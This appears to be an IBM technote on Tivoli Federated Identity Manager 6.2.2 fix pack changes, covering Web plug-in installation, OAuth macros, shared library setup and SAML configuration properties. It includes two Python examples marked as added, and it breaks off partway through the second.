Note: In a cluster environment, this step must be repeated on all machines hosting a node member of the WebSphere cluster running the Tivoli Federated Identity Manager runtime.
Back to Contents
IBM TIVOLI FEDERATED
IDENTITY MANAGER WEB PLUG-IN UPDATES (IV17421)
Tivoli® Federated Identity Manager provides Web
plug-ins for various HTTP web servers. The primary function of the
plug-in is to extract the user identity information from the LTPA cookie
in a web request. The plug-in also makes the identity information
available to the target application hosted by the web server. The
plug-in uses either HTTP headers or server variables, if supported by
the web server.
This section covers the following topics:
About Tivoli Federated Identity Manager Web plug-in updates
The IBM® Tivoli Federated
Identity Manager 6.2.2 fix pack ships with updated Tivoli Federated
Identity Manager plug-ins which were tested with current versions of the
HTTP servers and operating systems.
Contents
This technote details the following information about the updated Tivoli Federated Identity Manager plug-ins:
- Support for new platforms
- Support for new HTTP server versions
- Workaround for installing the IBM Tivoli Federated Identity Manager 6.2.2 fix pack on Windows Server 2008
- Instructions for installing the IBM Tivoli Federated Identity Manager, 6.2.2, WebPI fix pack
- Instructions for configuring the IBM Tivoli Federated Identity Manager Web plug-in Custom LTPA Cookie Name
- Instructions for uninstalling the IBM Tivoli Federated Identity Manager, 6.2.2, WebPI fix pack
Prerequisites and requirements
Install the following prerequisites before you use the updated IBM Tivoli Federated Identity Manager plug-ins:
- For Windows: Microsoft Visual C++ version 10.0 Redistributable package
The updated IBM Tivoli Federated Identity Manager plug-ins were tested with the following operating system and software combinations:
- IIS 6.0 on Windows Server 2003 (32 bit)
- IIS 7.0 on Windows Server 2008 (32 bit and 64 bit)
- IIS 7.5 on Windows Server 2008 R2 (32 bit* and 64 bit)
- Apache 2.0 on Linux (32 bit)
- Apache 2.2 on Linux (32 bit and 64 bit)
- IBM HTTP Server 6.1 on Linux (32 bit)
- IBM HTTP Server 7.0 on Linux (32 bit)
- IBM HTTP Server 8.0 on Linux (32 bit and 64 bit)
NOTE: * Denotes compatibility mode.
Known issue with workaround
Issue: The IBM Tivoli Federated Identity Manager 6.2.2 GA installer cannot install the IIS plug-in on Windows Server 2008.
Description: In the IBM Tivoli Federated Identity Manager 6.2.2 GA version, the IIS plug-in can be installed only on Windows Server 2003, and cannot be installed on Windows Server 2008.
Workaround: This is an issue when trying to install the Web plug-ins for Windows Server 2008 because the GA installer cannot install the Web plug-ins. An IBM Tivoli Federated Identity Manager component must be installed before installing any fix pack package. Install a lightweight IBM Tivoli Federated Identity Manager component such as Web Services Security Management. Then, use the Update Installer to install the web plug-in fix pack package.
Known limitation
LTPA Cookie name
Tivoli Federated Identity Manager 6.2.2 fix pack 2 introduced the ability to modify the name of the LTPA cookie that the Web plug-ins can process.
The LTPA Cookie Name cannot be modified from the Tivoli Federated Identity Manager console.
It can be modified only in the itfimwebpi.xml file.
Installing the IBM Tivoli Federated Identity Manager, 6.2.2, WebPI fix pack on specific platforms
For x86 Linux
NOTE: All the instances of $FIMInstallLocation in this section refer to the standard location of the Tivoli Federated Identity Manager 6.2.2 files in your directory.
- Back up the existing $FIMInstallLocation/webpi directory.
- Remove any files in the $FIMInstallLocation/webpi directory.
- Install the WebSphere® Application Server Update Installer utility for x86 Linux.
- Run the Update Installer.
- Select 6.2.2-TIV-TFIM-FP0018-WebPlugin.pak.
- Install GSKit. On the command line, type:
rpm -ivh /opt/IBM/FIM/webpi/x86_linux_2/gskit-installer/gsk7bas-7.0-4.38.i386.rpm
- Migrate the itfimwebpi.xml configuration from the $FIMInstallLocation/webpi directory that you backed up to the $FIMInstallLocation/webpi/x86_linux_2/etc/ directory.
- Copy the ltpa.keys file to the $FIMInstallLocation/webpi/x86_linux_2/etc directory.
- Reconfigure the HTTP Server to use the new plug-in binary. Add or modify the following line for the appropriate HTTP servers:
apache20: LoadModule fimwebpi_module /opt/IBM/FIM/webpi/x86_linux_2/lib/libitfimwebpi-apache20.so
apache22: LoadModule fimwebpi_module /opt/IBM/FIM/webpi/x86_linux_2/lib/libitfimwebpi-apache22.so
IHS 6.0: LoadModule fimwebpi_module /opt/IBM/FIM/webpi/x86_linux_2/lib/libitfimwebpi-apache20.so
IHS 7.0: LoadModule fimwebpi_module /opt/IBM/FIM/webpi/x86_linux_2/lib/libitfimwebpi-apache22.so
IHS 8.0: LoadModule fimwebpi_module /opt/IBM/FIM/webpi/x86_linux_2/lib/libitfimwebpi-apache22.so
- Add the following environment variables permanently to the shell environment of the current user:
export LD_LIBRARY_PATH=/opt/IBM/FIM/webpi/x86_linux_2/lib
export ITFIMWEBPI=/opt/IBM/FIM/webpi/x86_linux_2
- Restart the web server.
For x86 Windows
NOTE: All the instances of $FIMInstallLocation in this section refer to the standard location of the Tivoli Federated Identity Manager 6.2.2 files in your directory.
- Back up the existing $FIMInstallLocation\webpi directory.
- Remove any files in the $FIMInstallLocation\webpi directory.
- Install the WebSphere Application Server Update Installer utility for x86 Windows.
NOTE: For Windows Server 2008, install a Tivoli Federated Identity Manager component in the $FIMInstallLocation directory so that the Update Installer can allow the fix pack installation.
- Run the Update Installer utility.
- Select 6.2.2-TIV-TFIM-FP0018-WebPlugin.pak.
- Install GSKit. On the command line, type:
C:\Program Files\IBM\FIM\webpi\x86_nt_4\gskit-installer>setup.exe setup.iss
- Migrate the itfimwebpi.xml configuration from the $FIMInstallLocation directory that you backed up to the $FIMInstallLocation\webpi\x86_nt_4\etc directory.
- Copy the ltpa.keys file to the $FIMInstallLocation\webpi\x86_nt_4\etc directory.
- Configure IIS to use the Tivoli Federated Identity Manager Web plug-ins ISAPI filter.
- For IIS 6, run the following commands. The first command lists the web server IDs to be used in the configuration script:
C:\Program Files\IBM\FIM\webpi\x86_nt_4\bin>cscript.exe /nologo fimpiiiscfg.vbs -action list-webservers
C:\Program Files\IBM\FIM\webpi\x86_nt_4\bin>cscript.exe /nologo fimpiiiscfg.vbs -action config -path "c:\Program Files\IBM\FIM\webpi\x86_nt_4" -webserver <web-server-id>
- For IIS 7.x, run the following command:
C:\Windows\System32\inetsrv>appcmd.exe set config "Default Web Site" -section:system.webServer/isapiFilters/+"[name='ITFIMWEBPI',path='C:\Program Files\IBM\FIM\webpi\x86_nt_4\bin\itfimwebpi-iis.dll',enabled='True',enableCache='True']" /commit:apphost
- Install any additional prerequisites. In this case, install the following Microsoft Visual C++ Redistributable packages:
- Set the environment variable for the Operating System. Select .
ITFIMWEBPI=c:\Program Files\IBM\FIM\webpi\x86_nt_4
- Add C:\Program Files\IBM\gsk7\lib to the path.
- Restart the system and the web server.
For x64 Linux
NOTE: All the instances of $FIMInstallLocation in this section refer to the standard location of the Tivoli Federated Identity Manager 6.2.2 files in your directory.
- Back up the existing $FIMInstallLocation/webpi directory.
- Remove any files in the $FIMInstallLocation/webpi directory.
- Install the WebSphere Application Server Update Installer utility for x64 Linux.
- Run the Update Installer.
- Select 6.2.2-TIV-TFIM-FP0018-WebPlugin.pak.
- Install GSKit. On the command line, type:
rpm -ivh /opt/IBM/FIM/webpi/amd64_linux_2/gskit-installer/gsk7bas64-7.0-4.38.x86_64.rpm
- Migrate the itfimwebpi.xml configuration from the $FIMInstallLocation/webpi directory that you backed up to the $FIMInstallLocation/webpi/x64_linux_2/etc/ directory.
- Copy the ltpa.keys file to the $FIMInstallLocation/webpi/x64_linux_2/etc directory.
- Reconfigure the HTTP Server to use the new plug-in binary. Add or modify the following line for the appropriate HTTP servers:
apache22: LoadModule fimwebpi_module /opt/IBM/FIM/webpi/amd64_linux_2/lib/libitfimwebpi-apache22.so
IHS 7.0: LoadModule fimwebpi_module /opt/IBM/FIM/webpi/amd64_linux_2/lib/libitfimwebpi-apache22.so
IHS 8.0: LoadModule fimwebpi_module /opt/IBM/FIM/webpi/amd64_linux_2/lib/libitfimwebpi-apache22.so
- Add the following environment variables permanently to the shell environment of the current user:
export LD_LIBRARY_PATH=/opt/IBM/FIM/webpi/amd64_linux_2/lib
export ITFIMWEBPI=/opt/IBM/FIM/webpi/amd64_linux_2
- Restart the web server.
For x64 Windows
NOTE: All the instances of $FIMInstallLocation in this section refer to the standard location of the Tivoli Federated Identity Manager 6.2.2 files in your directory.
- Back up the existing $FIMInstallLocation\webpi directory.
- Remove any files in the $FIMInstallLocation\webpi directory.
- Install the WebSphere Application Server Update Installer utility for x64 Windows.
NOTE: For Windows Server 2008, install a Tivoli Federated Identity Manager component in the $FIMInstallLocation directory so that the Update Installer can allow the fix pack installation.
- Run the Update Installer.
- Select 6.2.2-TIV-TFIM-FP0018-WebPlugin.pak.
- Install GSKit. Execute the following command:
C:\Program Files (x86)\IBM\FIM\webpi\x86_64_nt_4\gskit-installer>GSK7BAS_64.msi
- Migrate the itfimwebpi.xml configuration from the $FIMInstallLocation directory that you backed up to the $FIMInstallLocation\webpi\x86_64_nt_4\etc directory.
- Copy the ltpa.keys file to the $FIMInstallLocation\webpi\x86_64_nt_4\etc directory.
- Configure IIS to use the Tivoli Federated Identity Manager Web plug-ins ISAPI filter. Run the following command:
C:\Windows\System32\inetsrv>appcmd.exe set config -section:system.webServer/isapiFilters /+"[name='ITFIMWEBPI',path='C:\Program Files (x86)\IBM\FIM\webpi\x86_64_nt_4\bin\itfimwebpi-iis.dll',enabled='True',enableCache='True']" /commit:apphost
- Install any additional prerequisites. In this case, install the following Microsoft Visual C++ Redistributable packages:
- Set the environment variable for the Operating System. Select .
ITFIMWEBPI=C:\Program Files (x86)\IBM\FIM\webpi\x86_64_nt_4
- Add C:\Program Files\IBM\GSK7_64\lib64 to the path.
- Restart the system and the web server.
Other Setup and Configuration
Tivoli Federated Identity Manager Web plug-ins Custom LTPA Cookie Name
Configure the name of the cookie containing the LTPA token in FIM WebPI. The WebPI uses the default value LtpaToken2 when a custom name is not provided.
- Update the itfimwebpi.xml.template file with a new attribute in the LTPAConfiguration element called ltpaCookieName. For example:
<pi:LTPAConfiguration id="uuid-6cd36543-3404-42fg-8314-0800200c9a66" ltpaPassword="@@LTPA_PASSWORD@@" ltpaCookieName="LtpaToken2"/>
- Modify the custom LTPA cookie name in a text editor.
Uninstalling the IBM Tivoli Federated Identity Manager, 6.2.2, WebPI fix pack on specific platforms
NOTE: All the instances of $FIMInstallLocation in this section refer to the standard location of the Tivoli Federated Identity Manager 6.2.2 files in your directory.
For x86 Linux
- Stop the web server.
- Use the IBM WebSphere Update Installer to uninstall the Web plug-ins. The Web plug-in files are removed from the $FIMInstallLocation directory.
- Modify the web server configuration files. Find and remove any of the following instances:
- For Apache22 based server: LoadModule fimwebpi_module $FIMInstallLocation/$CONTEXT/lib/libitfimwebpi-apache22.so
- For Apache20 based server: LoadModule fimwebpi_module $FIMInstallLocation/$CONTEXT/lib/libitfimwebpi-apache20.so
- Unset or modify the LD_LIBRARY_PATH so that it does not contain a path where the Tivoli Federated Identity Manager 6.2.2 fix pack Web plug-ins were installed.
- Unset the ITFIMWEBPI environment variable.
For x86 Windows
Before running the Update Installer to uninstall the Web plug-in fix pack, do the following steps to remove the Web plug-in fix pack configurations.
- Run the unconfigure script or command:
- For IIS 6.0:
cd "C:\Program Files\IBM\FIM\webpi\x86_nt_4\bin"
cscript.exe /nologo "C:\Program files\IBM\FIM\webpi\x86_nt_4\bin\fimpiiiscfg.vbs" -action unconfig
- For IIS 7.x:
C:\Windows\System32\inetsrv>appcmd.exe set config "Default Web Site" -section:system.webServer/isapiFilters/-"[name='ITFIMWEBPI',path='C:\Program Files\IBM\FIM\webpi\x86_nt_4\bin\itfimwebpi-iis.dll',enabled='True',enableCache='True']" /commit:apphost
- Uninstall the Microsoft Visual C++ redistributable.
- Delete the ITFIMWEBPI environment variable.
- Delete the GSKit library path from the PATH environment variable.
For x64 Linux
NOTE: All the instances of $FIMInstallLocation in this section refer to the standard location of the Tivoli Federated Identity Manager 6.2.2 files in your directory.
- Stop the web server.
- Use the IBM WebSphere Update Installer to uninstall the Web plug-ins. The Web plug-in files are removed from the $FIMInstallLocation directory.
- Modify the web server configuration files. Find and remove any of the following instances:
- For Apache22 based server: LoadModule fimwebpi_module $FIMInstallLocation/$CONTEXT/lib/libitfimwebpi-apache22.so
- For Apache20 based server: LoadModule fimwebpi_module $FIMInstallLocation/$CONTEXT/lib/libitfimwebpi-apache20.so
- Unset or modify the LD_LIBRARY_PATH so that it does not contain a path where the Tivoli Federated Identity Manager 6.2.2 fix pack Web plug-ins were installed.
- Unset the ITFIMWEBPI environment variable.
For x64 Windows
- Run the unconfigure command:
C:\Windows\System32\inetsrv>appcmd.exe set config "Default Web Site" -section:system.webServer/isapiFilters/-"[name='ITFIMWEBPI',path='C:\Program Files (x86)\IBM\FIM\webpi\x86_64_nt_4\bin\itfimwebpi-iis.dll',enabled='True',enableCache='True']" /commit:apphost
- Uninstall the Microsoft Visual C++ redistributable.
- Delete the ITFIMWEBPI environment variable.
- Delete the GSKit library path from the PATH environment variable.
Back to Contents
FIXES FOR OAUTH (IV17609)
OAuth authentication macros are now available in IBM Tivoli
Federated Identity Manager, version 6.2.2, fix pack .
IBM® Tivoli® Federated Identity Manager supplies contextual
authentication parameters in customizing login forms.
When using WebSEAL as the point of contact server, these are
query-string parameters to the login page.
For WebSphere Application Server, they are in the WASReqURL cookie when the login
page is loaded. The parameters are macros in the configuration of the
authentication callback for the point of contact server profile.
NOTE: When you use the WebSphere point of contact, the
value of the query string parameter needs to be URL decoded twice.
The OAuth 1.0 and 2.0 authorization endpoints in IBM® Tivoli® Federated
Identity Manager, version 6.2.2, fix pack , now support OAuth
parameters in the HTTP POST body.
NOTE: The Tivoli Access Manager configuration utility was
modified to attach an unauthenticated ACL to the authorization endpoints
instead of an authenticated ACL.
If you have existing OAuth federations that use Tivoli Access Manager
WebSEAL as their point of contact that were created with an
earlier version (before IBM Tivoli® Federated Identity Manager 6.2.2
fix pack 2), rerun the Tivoli Access Manager configuration utility
after updating to IBM Tivoli® Federated Identity Manager 6.2.2 fix pack .
OAuth protocol supported macros for customizing an authentication login form
The following table, which indicates how an OAuth federation populates the authentication macros, is added to the Supported macros for customizing an authentication login form section of the Configuration Guide.
Macro          Query-String Parameter name   Description and value
%FEDID%        FedId                         A unique identifier (UUID) used internally by Tivoli Federated Identity Manager to identify the federation.
%FEDNAME%      FedName                       The user-assigned name of the federation.
%PARTNERID%    PartnerId                     The OAuth unique client identifier.
%TARGET%       Target                        OAuth client redirection URI.
%SSOREQUEST%   SSORequest                    A base-64 encoded string representing the query and body parameters from the OAuth request.
Back to Contents
FIM FSSO AND WSSM CANNOT BE INSTALLED ON THE SAME WAS (IV19846)
Use the following documentation updates for the
corresponding IBM® Tivoli® Federated Identity Manager versions:
Updates in the IBM Tivoli Federated Identity Manager
version 6.2.0 documentation
In the IBM Tivoli Federated Identity Manager Web
Service Security Management Configuration Guide, under the Configuring
WebSphere Application Server, add a subsection that describes methods to
associate the shared library with web service applications after the Configuring
for a Cluster Environment section. See the following instructions:
Associating a shared library
Associate the shared library with web service
provider and requester applications before the shared library can be
used by these applications. Use any of the following methods:
- Associating a shared library with an application.
- Associating a shared library with a server.
Associating a shared library with an application
This method associates the shared library with a specified application. All the applications that use the shared library must follow this procedure:
NOTE: You must use
the administrative console associated with the application server
where the Web services security management component is installed.
- Select in the console navigation to access
the Shared library references page.
- In the Shared library references page, select an
application or module that you want to associate with the shared
library.
- Select Reference shared libraries.
- In the Shared Library Mapping page, select the
ITFIM_WSSM shared library from the Available list.
- Click >> to add the ITFIM_WSSM
shared library to the selected list.
- Click OK.
- In the Shared library references page, click OK.
- Save the configuration changes.
Associating a shared library with a
server
NOTE: In the IBM Tivoli Federated
Identity Manager Web Service Security Management Configuration Guide,
under the section Configuring WebSphere Application Server, move the
Configuring the Class Loader subsection under the Associating Shared
Library subsection as the second subsection.
See the following content changes:
Associate the shared library with a specified server. The shared library
is associated with all the applications in the server.
NOTE: Do not use this method if Federated Single Sign On is
configured in the same WebSphere Application Server.
- Start the WebSphere Application Server
administrative console.
- Log in, if necessary.
NOTE: You must use
the administrative console associated with the application server
where the Web Services Security Management component is installed.
- Select .
- Select the server associated with your
application. For example, server1.
- In the Server Infrastructure pane, expand Java
and Process Management option.
- Click Class loader.
- Click New.
- Do not change any options.
- Click Apply.
- In the Additional Properties pane, select Shared
Library references.
- Click Add to specify a shared library.
- In the Library name field, select the ITFIM_WSSM
shared library previously defined.
- Click OK.
- In the Messages pane at the top of the
Application Servers window, click Save to commit your changes.
Updates in the IBM Tivoli Federated Identity Manager version 6.2.1 and 6.2.2 documentation
In the IBM Tivoli Federated Identity Manager Web Service Security Management Configuration Guide, under the section Configuring WebSphere Application Server, the fifth step to configure WebSphere Application Server is changed to: You must associate the shared library with web service provider and requester applications before the shared library can be used by these applications.
About this task
In the IBM Tivoli Federated Identity Manager Web Service Security Management Configuration Guide, under the section Configuring WebSphere Application Server, a subsection that describes methods to associate the shared library with web service applications is added right after the section Configuring for a Cluster Environment. See the following instructions:
Associating a shared library
You must associate the shared library with
web service provider and requester applications before the shared
library can be used by these applications. Use any of the following
methods:
- Associating a shared library with an application.
- Associating a shared library with a server.
NOTE: Add a subsection that
describes the method to associate the shared library with a web service
application. See the following section for details:
Associating a shared library with an
application
This method associates the shared library with a specified application.
All the applications that use the shared library must follow this
procedure:
- Start the WebSphere Application Server
administrative console.
- Log in, if necessary.
NOTE: You must use
the administrative console associated with the application server
where the Web Services Security Management component is installed.
- Select from the console navigation tree to
access the Shared library references page.
- In the Shared library references page, select an
application or module that you want to associate with the shared
library.
- Select Reference shared libraries.
- In the Shared Library Mapping page, select the
ITFIM_WSSM shared library from the Available list.
- Click >> to add them to the selected
list.
- Click OK.
- In the Shared library references page, click OK.
- Save the configuration changes.
Associating a shared library with a
server
NOTE: In the IBM Tivoli Federated
Identity Manager Web Service Security Management Configuration Guide,
under the section Configuring WebSphere Application Server, move the
Configuring the Class Loader subsection under the Associating
shared library with an application section as the second subsection. See
the following instructions for details:
Associate the shared library with a specified server. The shared
library is associated with all the applications in the server.
NOTE: Do not use this method if
Federated Single Sign On is configured in the same WebSphere Application
Server.
- Start the WebSphere Application Server
administrative console.
- Log in, if necessary.
NOTE: You must use
the administrative console associated with the application server
where the Web Services Security Management component is installed.
- Select .
- Select the server associated with your
application. For example, server1.
- In the Server Infrastructure pane, expand the Java
and Process Management option.
- Click Class loader.
- Click New.
- Do not change any of the options.
- Click Apply.
- In the Additional Properties pane, select Shared
Library references.
- Click Add to specify a shared library.
- In the Library name field, select the ITFIM_WSSM
shared library previously defined.
- Click OK.
- In the Messages pane at the top of the
Application Servers window, click Save to commit your changes.
Back to Contents
INCORRECT ONLINE DOCUMENT FOR THE INSTALLATION NEEDS TO BE CHANGED (IV19850)
There was an error in the command value used for installing the
Tivoli Federated Identity Manager, version 6.2.2 Web Services Security
Management feature.
Replace the installation command note in the following sections
of the Tivoli Federated Identity Manager, version 6.2.2 Installation
Guide:
Installing federated single sign-on or token exchange
> Installing the federated single sign-on feature > Installing
federated single sign-on on an existing WebSphere Application Server
Installing Web services security management >
Installing the Web services security management feature
Installing federated provisioning > Installing
WS-Provisioning runtime
Installing the management console > Installing the
management console
Installing the IBM Support Assistant
with the following:
NOTE: The installation is designed so that the WebSphere® Application Server deployment can listen on localhost. If it does not listen on localhost, use the parameter websphereProperties.adminClientConnectorHost on the installation command to specify the host name. For example, on Linux:
./install_linux_x86.bin -W websphereProperties.adminClientConnectorHost=<hostname>
Back to Contents
ENABLING THE AUTHENTICATING AUTHORITY ATTRIBUTE (IV17409)
The AuthenticatingAuthority attribute is a
unique identifier that determines the authenticating authority involved
in the authentication of the principal.
An example of an authenticating authority is WebSEAL.
For scenarios where you might have multiple authenticating authorities,
this feature helps in identifying the specific authentication authority
that authenticated the principal. Service providers can then use this
information to carry out different actions.
To enable this capability, you must add the following STSUUSER attribute:
- Name: AuthenticatingAuthority
- Type: urn:oasis:names:tc:SAML:2.0:assertion
You must add this attribute in the mapping module of the Identity
Provider. You can use one of the supported mapping rules such as XSL,
Tivoli Directory Integrator (TDI), JavaScript, and custom map module.
Insert the AuthenticatingAuthority attribute in the
mapping rule as shown in the examples.
- JavaScript example:
importPackage(Packages.com.tivoli.am.fim.trustserver.sts);
importPackage(Packages.com.tivoli.am.fim.trustserver.sts.uuser);
...
// Example of adding the AuthenticatingAuthority for SAML 2.0.
// The attribute value is the URI that identifies the authenticating authority.
var authenticatingAuthorityAttr = new Attribute("AuthenticatingAuthority",
    "urn:oasis:names:tc:SAML:2.0:assertion", "https://idp.example.com");
stsuu.addAttribute(authenticatingAuthorityAttr);
- XSL example:
<xsl:stylesheet extension-element-prefixes="mapping-ext" version="1.0">
<xsl:strip-space elements="*"/>
<xsl:output method="xml" version="1.0" encoding="utf-8" indent="yes"/>
...
<xsl:template match="//stsuuser:AttributeList">
  <stsuuser:AttributeList>
    <!-- Example of adding the authenticating authority attribute -->
    <stsuuser:Attribute name="AuthenticatingAuthority"
        type="urn:oasis:names:tc:SAML:2.0:assertion">
      <stsuuser:Value>https://idp.example.com</stsuuser:Value>
    </stsuuser:Attribute>
  </stsuuser:AttributeList>
</xsl:template>
...
</xsl:stylesheet>
When the AuthenticatingAuthority subelement is
available in the AuthnContext element of
the SAML 2.0 assertion, the following STSUUSER
attribute is available at the Service Provider:
<stsuuser:Attribute name="AuthenticatingAuthority"
    type="urn:oasis:names:tc:SAML:2.0:assertion">
  <stsuuser:Value>https://idp.example.com</stsuuser:Value>
</stsuuser:Attribute>
After obtaining information from this
attribute, service providers can then perform any required actions.
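As an added example (not code from the fix pack or the product), the following Python extracts the AuthenticatingAuthority subelement of AuthnContext from a constructed SAML 2.0 assertion, renders the STSUUSER attribute in the form shown above, and applies the kind of service-provider decision the section mentions, here against a constructed allow-list of known authorities. The assertion, the allow-list and the action names are assumptions; the namespace and attribute name are the page's.

```python
"""Added example: AuthenticatingAuthority from a SAML 2.0 assertion to the
STSUUSER attribute shown on the page, plus an SP-side allow-list decision."""
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape, quoteattr

SAML2_NS = "urn:oasis:names:tc:SAML:2.0:assertion"
ATTR_NAME = "AuthenticatingAuthority"

# Constructed sample assertion (not captured from a real IdP); only the
# AuthnStatement/AuthnContext part matters for this example.
SAMPLE_ASSERTION = f"""<saml:Assertion xmlns:saml="{SAML2_NS}" ID="_constructed"
    Version="2.0" IssueInstant="2018-04-19T00:00:00Z">
  <saml:Issuer>https://idp.example.com</saml:Issuer>
  <saml:Subject><saml:NameID>alice</saml:NameID></saml:Subject>
  <saml:AuthnStatement AuthnInstant="2018-04-19T00:00:00Z">
    <saml:AuthnContext>
      <saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport</saml:AuthnContextClassRef>
      <saml:AuthenticatingAuthority>https://idp.example.com</saml:AuthenticatingAuthority>
    </saml:AuthnContext>
  </saml:AuthnStatement>
</saml:Assertion>"""


def authenticating_authorities(assertion_xml: str) -> list[str]:
    """Return every AuthenticatingAuthority value found under AuthnContext.

    SAML 2.0 allows zero or more of these elements; an assertion without one
    yields an empty list, which the SP must treat as 'authority unknown'.
    """
    root = ET.fromstring(assertion_xml)
    path = (f".//{{{SAML2_NS}}}AuthnStatement/{{{SAML2_NS}}}AuthnContext/"
            f"{{{SAML2_NS}}}{ATTR_NAME}")
    return [el.text.strip() for el in root.findall(path) if el.text and el.text.strip()]


def to_stsuu_attribute(values: list[str]) -> str:
    """Render the STSUUSER attribute in the form the page shows at the SP.
    The stsuuser: prefix is used as on the page, without a namespace declaration;
    values are XML-escaped so an authority URI cannot break the element."""
    value_xml = "".join(f"\n  <stsuuser:Value>{escape(v)}</stsuuser:Value>" for v in values)
    return (f'<stsuuser:Attribute name="{ATTR_NAME}" type={quoteattr(SAML2_NS)}>'
            f"{value_xml}\n</stsuuser:Attribute>")


def decide_action(values: list[str], actions_by_authority: dict[str, str]) -> str:
    """SP-side policy (constructed, not TFIM behaviour): exactly one authority,
    and it must be on the allow-list; anything else is denied."""
    if len(values) != 1 or values[0] not in actions_by_authority:
        return "deny"
    return actions_by_authority[values[0]]


if __name__ == "__main__":
    found = authenticating_authorities(SAMPLE_ASSERTION)
    print(to_stsuu_attribute(found))
    print(decide_action(found, {"https://idp.example.com": "allow-standard"}))
```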
Back to Contents
CUSTOM PROPERTIES FOR SAML 2.0 RELAY STATE (IV17413)
- SAML20.IDP.UnsolicitedSSO.RelayState.URLEncoding
  When specified as true, the RelayState in an unsolicited authentication response is URL encoded by the identity provider before it is sent to the service provider. This configuration applies to a response that is sent using the HTTP POST binding and the HTTP ARTIFACT binding with the HTTP POST artifact delivery method.
  The URL encoding can be controlled at three levels:
  - Global level: controls the URL encoding for all federations and partners.
    Configuration example: SAML20.IDP.UnsolicitedSSO.RelayState.URLEncoding = true
  - Federation level: controls the URL encoding for a specific federation and all its partners.
    Configuration example: SAML20.IDP.UnsolicitedSSO.RelayState.URLEncoding_<FEDERATIONID> = true
    Example for a federation with the ID https://idp/sps/fed/saml20:
    SAML20.IDP.UnsolicitedSSO.RelayState.URLEncoding_https://idp/sps/fed/saml20 = true
  - Partner level: controls the URL encoding for a specific federation and a specific partner.
    Configuration example: SAML20.IDP.UnsolicitedSSO.RelayState.URLEncoding_<FEDERATIONID>_<PARTNERID> = true
    Example for a federation with the ID https://idp/sps/fed/saml20 and its partner with the ID https://sp/sps/fed/saml20:
    SAML20.IDP.UnsolicitedSSO.RelayState.URLEncoding_https://idp/sps/fed/saml20_https://sp/sps/fed/saml20 = true
  Default value: True
  Value type: Boolean
  Example value: False
  <FEDERATIONID> represents the Provider ID of the federation and <PARTNERID> represents the Provider ID of the partner. You can obtain the Provider ID of the federation from the Federation Properties page in the console, and the Provider ID of the partner from the Partner Properties page in the console.
  You can use the three levels of control concurrently. Tivoli Federated Identity Manager implements concurrent use by checking the RelayState settings in the following order to decide what action to take:
  - Partner level setting
  - Federation level setting
  - Global level setting
  When at least one of the settings is false, add the macro @TOKEN:RelayState@ to the comma-separated list of tokens in the runtime custom property SPS.PageFactory.HtmlEscapedTokens, so that the RelayState is HTML-escaped in the authentication response.
- SAML20.SP.UnsolicitedSSO.RelayState.URLEncoding
  When specified as true, the RelayState in an unsolicited authentication response is URL decoded by the service provider after it is received from the identity provider.
  The URL encoding can be controlled at three levels:
  - Global level: controls the URL encoding for all federations and partners.
    Configuration example: SAML20.SP.UnsolicitedSSO.RelayState.URLEncoding = true
  - Federation level: controls the URL encoding for a specific federation and all its partners.
    Configuration example: SAML20.SP.UnsolicitedSSO.RelayState.URLEncoding_<FEDERATIONID> = true
    Example for a federation with the ID https://sp/sps/fed/saml20:
    SAML20.SP.UnsolicitedSSO.RelayState.URLEncoding_https://sp/sps/fed/saml20 = true
  - Partner level: controls the URL encoding for a specific federation and a specific partner.
    Configuration example: SAML20.SP.UnsolicitedSSO.RelayState.URLEncoding_<FEDERATIONID>_<PARTNERID> = true
    Example for a federation with the ID https://sp/sps/fed/saml20 and its partner with the ID https://idp/sps/fed/saml20:
    SAML20.SP.UnsolicitedSSO.RelayState.URLEncoding_https://sp/sps/fed/saml20_https://idp/sps/fed/saml20 = true
  Default value: True
  Value type: Boolean
  Example value: False
  <FEDERATIONID> represents the Provider ID of the federation and <PARTNERID> represents the Provider ID of the partner. You can obtain the Provider ID of the federation from the Federation Properties page in the console, and the Provider ID of the partner from the Partner Properties page in the console.
  You can use the three levels of control concurrently. Tivoli Federated Identity Manager implements concurrent use by checking the RelayState settings in the following order to decide what action to take:
  - Partner level setting
  - Federation level setting
  - Global level setting
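The resolution order described for both SAML20.IDP.UnsolicitedSSO.RelayState.URLEncoding and SAML20.SP.UnsolicitedSSO.RelayState.URLEncoding, as an added example that is not part of the fix pack or the product: it resolves the effective setting (partner, then federation, then global, default True) and derives the SPS.PageFactory.HtmlEscapedTokens change the IDP section requires when any setting is false. Property names, macro and IDs are the page's; the property dictionary is constructed.

```python
"""Added example: resolve the RelayState URL-encoding custom properties in the
documented order and check the HtmlEscapedTokens consequence on the IDP side."""

IDP_BASE = "SAML20.IDP.UnsolicitedSSO.RelayState.URLEncoding"
SP_BASE = "SAML20.SP.UnsolicitedSSO.RelayState.URLEncoding"
HTML_ESCAPED_TOKENS = "SPS.PageFactory.HtmlEscapedTokens"
RELAYSTATE_MACRO = "@TOKEN:RelayState@"


def parse_bool(raw: str) -> bool:
    """The page writes the value as true, True and False; anything else is a
    configuration error and is reported rather than silently treated as false."""
    value = raw.strip().lower()
    if value == "true":
        return True
    if value == "false":
        return False
    raise ValueError(f"not a boolean custom property value: {raw!r}")


def resolve_url_encoding(props: dict[str, str], base: str,
                         federation_id: str, partner_id: str) -> bool:
    """Most specific setting wins: partner, then federation, then global.
    No setting at any level means the documented default of True."""
    for key in (f"{base}_{federation_id}_{partner_id}",
                f"{base}_{federation_id}",
                base):
        if key in props:
            return parse_bool(props[key])
    return True


def idp_needs_relaystate_html_escape(props: dict[str, str]) -> bool:
    """True when at least one IDP-side setting, at any level, is false: the
    condition under which the page requires @TOKEN:RelayState@ in
    SPS.PageFactory.HtmlEscapedTokens so the RelayState is HTML-escaped."""
    return any(not parse_bool(v) for k, v in props.items()
               if k == IDP_BASE or k.startswith(IDP_BASE + "_"))


def html_escaped_tokens_with_relaystate(props: dict[str, str]) -> str:
    """Return the HtmlEscapedTokens value that satisfies the page's rule:
    unchanged if no IDP setting is false or the macro is already listed,
    otherwise with @TOKEN:RelayState@ appended to the comma-separated list."""
    current = props.get(HTML_ESCAPED_TOKENS, "")
    tokens = [t.strip() for t in current.split(",") if t.strip()]
    if idp_needs_relaystate_html_escape(props) and RELAYSTATE_MACRO not in tokens:
        tokens.append(RELAYSTATE_MACRO)
    return ",".join(tokens)


# Constructed runtime custom properties (sample, not from a real deployment);
# the federation and partner IDs are the ones used in the page's own examples.
SAMPLE_PROPS = {
    IDP_BASE: "true",
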